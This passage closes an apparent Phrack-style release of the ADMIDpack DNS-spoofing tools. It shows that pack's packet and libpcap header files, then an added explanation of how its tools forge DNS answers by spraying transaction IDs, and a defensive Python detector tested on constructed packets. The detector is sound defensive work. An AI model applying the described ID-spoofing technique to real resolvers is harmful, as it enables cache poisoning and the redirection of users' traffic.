 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
 * Berkeley Laboratory.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *      @(#)bpf.h       7.1 (Berkeley) 5/7/91
 *
 * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
 */

#ifndef BPF_MAJOR_VERSION

/* BSD style release date */
#define BPF_RELEASE 199606

typedef	int bpf_int32;
typedef	u_int bpf_u_int32;

/*
 * Alignment macros.  BPF_WORDALIGN rounds up to the next
 * even multiple of BPF_ALIGNMENT.
 */
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))

#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32

/*
 * Structure for BIOCSETF.
 */
struct bpf_program {
	u_int bf_len;
	struct bpf_insn *bf_insns;
};

/*
 * Struct returned by BIOCGSTATS.
 */
struct bpf_stat {
	u_int bs_recv;		/* number of packets received */
	u_int bs_drop;		/* number of packets dropped */
};

/*
 * Struct return by BIOCVERSION.  This represents the version number of
 * the filter language described by the instruction encodings below.
 * bpf understands a program iff kernel_major == filter_major &&
 * kernel_minor >= filter_minor, that is, if the value returned by the
 * running kernel has the same major number and a minor number equal
 * equal to or less than the filter being downloaded.
 * Otherwise, the
 * results are undefined, meaning an error may be returned or packets
 * may be accepted haphazardly.
 * It has nothing to do with the source code version.
 */
struct bpf_version {
	u_short bv_major;
	u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1

/*
 * BPF ioctls
 *
 * The first set is for compatibility with Sun's pcc style
 * header files.  If your using gcc, we assume that you
 * have run fixincludes so the latter set should work.
 */
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define	BIOCGBLEN	_IOR(B,102, u_int)
#define	BIOCSBLEN	_IOWR(B,102, u_int)
#define	BIOCSETF	_IOW(B,103, struct bpf_program)
#define	BIOCFLUSH	_IO(B,104)
#define BIOCPROMISC	_IO(B,105)
#define	BIOCGDLT	_IOR(B,106, u_int)
#define BIOCGETIF	_IOR(B,107, struct ifreq)
#define BIOCSETIF	_IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT	_IOR(B,110, struct timeval)
#define BIOCGSTATS	_IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW(B,112, u_int)
#define BIOCVERSION	_IOR(B,113, struct bpf_version)
#define BIOCSTCPF	_IOW(B,114, struct bpf_program)
#define BIOCSUDPF	_IOW(B,115, struct bpf_program)
#else
#define	BIOCGBLEN	_IOR('B',102, u_int)
#define	BIOCSBLEN	_IOWR('B',102, u_int)
#define	BIOCSETF	_IOW('B',103, struct bpf_program)
#define	BIOCFLUSH	_IO('B',104)
#define BIOCPROMISC	_IO('B',105)
#define	BIOCGDLT	_IOR('B',106, u_int)
#define BIOCGETIF	_IOR('B',107, struct ifreq)
#define BIOCSETIF	_IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT	_IOR('B',110, struct timeval)
#define BIOCGSTATS	_IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW('B',112, u_int)
#define BIOCVERSION	_IOR('B',113, struct bpf_version)
#define BIOCSTCPF	_IOW('B',114, struct bpf_program)
#define BIOCSUDPF	_IOW('B',115, struct bpf_program)
#endif

/*
 * Structure prepended to each packet.
 */
struct bpf_hdr {
	struct timeval	bh_tstamp;	/* time stamp */
	bpf_u_int32	bh_caplen;	/* length of captured portion */
	bpf_u_int32	bh_datalen;	/* original length of packet */
	u_short		bh_hdrlen;	/* length of bpf header (this struct
					   plus alignment padding) */
};
/*
 * Because the structure above is not a multiple of 4 bytes, some compilers
 * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
 * Only the kernel needs to know about it; applications use bh_hdrlen.
 */
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif

/*
 * Data-link level type codes.
 */
#define DLT_NULL	0	/* no link-layer encapsulation */
#define DLT_EN10MB	1	/* Ethernet (10Mb) */
#define DLT_EN3MB	2	/* Experimental Ethernet (3Mb) */
#define DLT_AX25	3	/* Amateur Radio AX.25 */
#define DLT_PRONET	4	/* Proteon ProNET Token Ring */
#define DLT_CHAOS	5	/* Chaos */
#define DLT_IEEE802	6	/* IEEE 802 Networks */
#define DLT_ARCNET	7	/* ARCNET */
#define DLT_SLIP	8	/* Serial Line IP */
#define DLT_PPP		9	/* Point-to-point Protocol */
#define DLT_FDDI	10	/* FDDI */
#define DLT_ATM_RFC1483	11	/* LLC/SNAP encapsulated atm */
#define DLT_RAW		12	/* raw IP */
#define DLT_SLIP_BSDOS	13	/* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS	14	/* BSD/OS Point-to-point Protocol */

/*
 * The instruction encondings.
 */
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define		BPF_LD		0x00
#define		BPF_LDX		0x01
#define		BPF_ST		0x02
#define		BPF_STX		0x03
#define		BPF_ALU		0x04
#define		BPF_JMP		0x05
#define		BPF_RET		0x06
#define		BPF_MISC	0x07

/* ld/ldx fields */
#define BPF_SIZE(code)	((code) & 0x18)
#define		BPF_W		0x00
#define		BPF_H		0x08
#define		BPF_B		0x10
#define BPF_MODE(code)	((code) & 0xe0)
#define		BPF_IMM 	0x00
#define		BPF_ABS		0x20
#define		BPF_IND		0x40
#define		BPF_MEM		0x60
#define		BPF_LEN		0x80
#define		BPF_MSH		0xa0

/* alu/jmp fields */
#define BPF_OP(code)	((code) & 0xf0)
#define		BPF_ADD		0x00
#define		BPF_SUB		0x10
#define		BPF_MUL		0x20
#define		BPF_DIV		0x30
#define		BPF_OR		0x40
#define		BPF_AND		0x50
#define		BPF_LSH		0x60
#define		BPF_RSH		0x70
#define		BPF_NEG		0x80
#define		BPF_JA		0x00
#define		BPF_JEQ		0x10
#define		BPF_JGT		0x20
#define		BPF_JGE		0x30
#define		BPF_JSET	0x40
#define BPF_SRC(code)	((code) & 0x08)
#define		BPF_K		0x00
#define		BPF_X		0x08

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)	((code) & 0x18)
#define		BPF_A		0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define		BPF_TAX		0x00
#define		BPF_TXA		0x80

/*
 * The instruction data structure.
 */
struct bpf_insn {
	u_short	code;
	u_char 	jt;
	u_char 	jf;
	bpf_int32 k;
};

/*
 * Macros for insn array initializers.
 */
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif

/*
 * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
 */
#define BPF_MEMWORDS 16

#endif
<-->
<++> ADMIDpack/dns.h
#define DNSHDRSIZE 12

struct dnshdr {
	unsigned short int id;
	unsigned char rd:1;		/* recursion desired */
	unsigned char tc:1;		/* truncated message */
	unsigned char aa:1;		/* authoritive answer */
	unsigned char opcode:4;		/* purpose of message */
	unsigned char qr:1;		/* response flag */
	unsigned char rcode:4;		/* response code */
	unsigned char unused:2;		/* unused bits */
	unsigned char pr:1;		/* primary server required (non standard) */
	unsigned char ra:1;		/* recursion available */
	unsigned short int que_num;
	unsigned short int rep_num;
	unsigned short int num_rr;
	unsigned short int num_rrsup;
};
<-->
<++> ADMIDpack/ip.h
/* adapted from tcpdump */

#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERISON */

struct iphdr {
	u_char	ihl:4,		/* header length */
		version:4;	/* version */
	u_char	tos;		/* type of service */
	short	tot_len;	/* total length */
	u_short	id;		/* identification */
	short	off;		/* fragment offset field */
#define	IP_DF 0x4000		/* dont fragment flag */
#define	IP_MF 0x2000		/* more fragments flag */
	u_char	ttl;		/* time to live */
	u_char	protocol;	/* protocol */
	u_short	check;		/* checksum */
	struct	in_addr saddr, daddr;	/* source and dest address */
};

#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */
<-->
<++> ADMIDpack/pcap.h
/*
 * Copyright (c) 1993, 1994, 1995, 1996, 1997
 *	The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3.
 *    All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the Computer Systems
 *	Engineering Group at Lawrence Berkeley Laboratory.
 * 4. Neither the name of the University nor of the Laboratory may be used
 *    to endorse or promote products derived from this software without
 *    specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
 */

#ifndef lib_pcap_h
#define lib_pcap_h

#include
#include
#include
#include

#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

#define PCAP_ERRBUF_SIZE 256

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
#if BPF_RELEASE - 0 < 199406
typedef	int bpf_int32;
typedef	u_int bpf_u_int32;
#endif

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are 32 bit ints so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
	bpf_u_int32 magic;
	u_short version_major;
	u_short version_minor;
	bpf_int32 thiszone;	/* gmt to local correction */
	bpf_u_int32 sigfigs;	/* accuracy of timestamps */
	bpf_u_int32 snaplen;	/* max length saved portion of each pkt */
	bpf_u_int32 linktype;	/* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
	struct timeval ts;	/* time stamp */
	bpf_u_int32 caplen;	/* length of portion present */
	bpf_u_int32 len;	/* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
	u_int ps_recv;		/* number of packets received */
	u_int ps_drop;		/* number of packets dropped */
	u_int ps_ifdrop;	/* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
			     const u_char *);

char	*pcap_lookupdev(char *);
int	pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t	*pcap_open_live(char *, int, int, int, char *);
pcap_t	*pcap_open_offline(const char *, char *);
void	pcap_close(pcap_t *);
int	pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int	pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
	pcap_next(pcap_t *, struct pcap_pkthdr *);
int	pcap_stats(pcap_t *, struct pcap_stat *);
int	pcap_setfilter(pcap_t *, struct bpf_program *);
void	pcap_perror(pcap_t *, char *);
char	*pcap_strerror(int);
char	*pcap_geterr(pcap_t *);
int	pcap_compile(pcap_t *, struct bpf_program *, char *, int,
	    bpf_u_int32);
/* XXX */
int	pcap_freecode(pcap_t *, struct bpf_program *);
int	pcap_datalink(pcap_t *);
int	pcap_snapshot(pcap_t *);
int	pcap_is_swapped(pcap_t *);
int	pcap_major_version(pcap_t *);
int	pcap_minor_version(pcap_t *);

/* XXX */
FILE	*pcap_file(pcap_t *);
int	pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void	pcap_dump_close(pcap_dumper_t *);
void
	pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int	bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char	*bpf_image(struct bpf_insn *, int);

#endif
<-->
<++> ADMIDpack/udp.h
struct udphdr {
	u_short	source;		/* source port */
	u_short	dest;		/* destination port */
	u_short	len;		/* udp length */
	u_short	check;		/* udp checksum */
};
<-->

----[ EOF
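The ADMIDpack tools above all turn on one weakness: a 1998-era resolver accepted any UDP answer that arrived on the right port with a 16-bit transaction ID matching an outstanding query, so ADMkillDNS and ADMnOg00d simply send a run of forged answers that differ only in the ID (and ADMsnOOfID/ADMsniffID read the ID off the wire instead). From the defender's side the same property is what makes the attack loud: a burst of answers for one name, from one source, with no matching query and sequential IDs. The following is an added example, written for this editing pass and not part of the ADM pack or of Phrack. It decodes the 12-byte DNS header with explicit bit masks rather than the compiler-dependent bitfield layout of the page's dns.h, builds constructed query/answer packets as test input (all addresses and names are made up, RFC 5737/6761 documentation values), and flags an ID spray against a resolver. The threshold, window and helper names are my own choices, not anything from the original.

```python
"""Decode DNS headers and detect a spray of forged answers that differ only in ID.

Added example (not from the ADM pack). Packets, addresses and names are
constructed in run_demo(); thresholds are illustrative assumptions.
"""
import struct
from collections import defaultdict, deque

DNS_HDR_LEN = 12                  # fixed header length, same value as DNSHDRSIZE in dns.h
TYPE_A, TYPE_PTR, CLASS_IN = 1, 12, 1


def parse_dns_header(payload):
    """Decode the RFC 1035 header (network byte order) into a dict of fields."""
    if len(payload) < DNS_HDR_LEN:
        raise ValueError("short DNS packet")
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:DNS_HDR_LEN])
    return {
        "id": ident,
        "qr": (flags >> 15) & 1,          # 0 = query, 1 = response
        "opcode": (flags >> 11) & 0xF,
        "aa": (flags >> 10) & 1,          # authoritative answer
        "tc": (flags >> 9) & 1,
        "rd": (flags >> 8) & 1,
        "ra": (flags >> 7) & 1,
        "rcode": flags & 0xF,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def parse_qname(payload, offset=DNS_HDR_LEN):
    """Read an uncompressed label sequence; returns (dotted name, offset after it)."""
    labels = []
    while True:
        if offset >= len(payload):
            raise ValueError("truncated name")
        n = payload[offset]
        if n == 0:
            return ".".join(labels), offset + 1
        if n & 0xC0:
            raise ValueError("compression pointers not handled in this example")
        labels.append(payload[offset + 1:offset + 1 + n].decode("ascii"))
        offset += 1 + n


def encode_name(name):
    """Dotted name -> DNS label wire format (no compression)."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_dns(ident, qname, answer_ip=None, rd=1):
    """Constructed test input: an A query, or an authoritative A answer if answer_ip is set."""
    qr = 1 if answer_ip else 0
    flags = (qr << 15) | (qr << 10) | (rd << 8)      # aa set on answers only
    pkt = struct.pack("!HHHHHH", ident, flags, 1, 1 if answer_ip else 0, 0, 0)
    pkt += encode_name(qname) + struct.pack("!HH", TYPE_A, CLASS_IN)
    if answer_ip:
        rdata = bytes(int(o) for o in answer_ip.split("."))
        pkt += encode_name(qname) + struct.pack("!HHIH", TYPE_A, CLASS_IN, 86400, 4) + rdata
    return pkt


class IdSprayDetector:
    """Track outstanding queries; flag bursts of unsolicited answers for one name."""

    def __init__(self, threshold=8, window=2.0):
        self.threshold = threshold            # distinct IDs within the window that trigger an alert
        self.window = window                  # seconds
        self.pending = {}                     # (resolver, port, id, qname) -> timestamp
        self.unsolicited = defaultdict(deque) # (src, dst, qname) -> deque of (ts, id)

    def observe(self, ts, src, sport, dst, dport, payload):
        hdr = parse_dns_header(payload)
        qname, _ = parse_qname(payload)
        if hdr["qr"] == 0:                                   # a query: remember it
            self.pending[(src, sport, hdr["id"], qname)] = ts
            return None
        if self.pending.pop((dst, dport, hdr["id"], qname), None) is not None:
            return None                                      # answer matches an open query
        q = self.unsolicited[(src, dst, qname)]
        q.append((ts, hdr["id"]))
        while q and ts - q[0][0] > self.window:
            q.popleft()
        ids = {i for _, i in q}
        if len(ids) >= self.threshold:
            return {"src": src, "dst": dst, "qname": qname,
                    "distinct_ids": len(ids), "id_min": min(ids), "id_max": max(ids)}
        return None


def run_demo():
    """One legitimate exchange, then a 20-answer ID spray; returns the alerts raised."""
    det = IdSprayDetector(threshold=8, window=2.0)
    events = []
    # legitimate: resolver 10.0.0.53:4096 asks, 192.0.2.10 answers with the same ID
    events.append(det.observe(0.0, "10.0.0.53", 4096, "192.0.2.10", 53,
                              build_dns(0x1234, "www.example.test")))
    events.append(det.observe(0.1, "192.0.2.10", 53, "10.0.0.53", 4096,
                              build_dns(0x1234, "www.example.test", "192.0.2.80")))
    # spray: answers with IDs 6000..6019, source claims to be a trusted NS, port 53 -> 53
    for n in range(20):
        events.append(det.observe(0.5 + n * 0.01, "198.51.100.2", 53, "10.0.0.53", 53,
                                  build_dns(6000 + n, "x.example.test", "203.0.113.7")))
    return [e for e in events if e]


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The detector keys unsolicited answers on (source, destination, name), so the first seven forged answers in the demo stay below the threshold and the eighth raises the first alert (IDs 6000 to 6007); the legitimate reply is consumed by the pending-query table and never counted. Masks are used instead of the dns.h bitfields because C leaves bitfield ordering to the implementation, which is also why such structs tend to break when ported. The mitigations that later closed this hole, unpredictable IDs plus randomized source ports, are visible in the same code path: both raise the number of guesses the spray needs far beyond the 10 IDs per round that ADMnOg00d tries.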